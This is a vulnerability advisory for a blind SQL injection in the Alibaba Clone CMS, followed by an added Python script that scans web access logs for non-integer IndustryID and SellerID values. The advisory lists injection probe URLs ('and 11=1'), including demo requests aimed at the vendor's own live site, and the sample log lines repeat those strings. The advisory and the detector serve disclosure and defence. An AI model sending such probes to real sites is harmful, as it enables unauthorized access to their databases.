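Affected software: WebDevelopmentHouse.com Alibaba Clone
Description:
The "IndustryID" parameter of category.php and the "SellerID" parameter of category.php / supplier/view_contact_details.php are not strictly filtered, so SQL injection is possible.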
- # [+] Alibaba-clone CMS Remote Blind SQL injection
- # [+] Author : 599eme Man
- # [+] Contact : Flouf@live.fr
- # [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker…
- # [+] Download : http://blog.duslerim.net/cms/alibabacom-clone-new.html
- #
- #[————————————————————————————]
- #
- #
- # [+] Exploit :
- #
- # http://www.site.com/path/supplier/view_contact_details.php?SellerID=[nr] and 11=1
- #
- # http://www.site.com/path/category.php?IndustryID=[nr] and 11=1
- #
- #[————————————————————————————]
- #
- #
- # [+] Demo :
- #
- # http://www.webdevelopmenthouse.com/alibaba-clone/supplier/view_contact_details.php?SellerID=24 and 11=1
- #
- # http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 11=1
- #
- #########################################################################################################
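For defenders running this application, requests of the shape quoted above can be found in web server access logs. The following is an added example, not part of the original advisory or of the product's code: it flags any request to the two reported scripts whose IndustryID or SellerID value is not a plain integer. The combined log format and the constructed sample lines (documentation IP addresses, invented timestamps) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path suffix -> parameter the advisory reports as unfiltered.
WATCHED = {
    "/category.php": "IndustryID",
    "/supplier/view_contact_details.php": "SellerID",
}

# Request line of a combined-format access log entry; ".+?" tolerates
# raw (unencoded) spaces inside the logged URL.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Both parameters are numeric record IDs, so anything else is anomalous.
INT_RE = re.compile(r"[0-9]{1,10}")


def suspicious_values(log_line):
    """Return [(param, decoded_value)] for watched parameters that are not integers."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    hits = []
    for suffix, param in WATCHED.items():
        if not url.path.endswith(suffix):
            continue
        # parse_qs percent-decodes and maps '+' to a space, so encoded
        # values are checked in the form the PHP script would receive.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        hits += [(param, v) for v in values if not INT_RE.fullmatch(v)]
    return hits


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /alibaba-clone/category.php?IndustryID=25 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /alibaba-clone/category.php?IndustryID=25%20and%2011=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /alibaba-clone/supplier/view_contact_details.php?SellerID=24+and+11=1 HTTP/1.1" 200 733',
]

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, start=1):
        for param, value in suspicious_values(line):
            print(f"line {number}: {param}={value!r}")
```

The same integer-only rule is the fix on the application side: rejecting or casting non-numeric IndustryID and SellerID values before they reach the query, together with parameterized queries, closes the injection point.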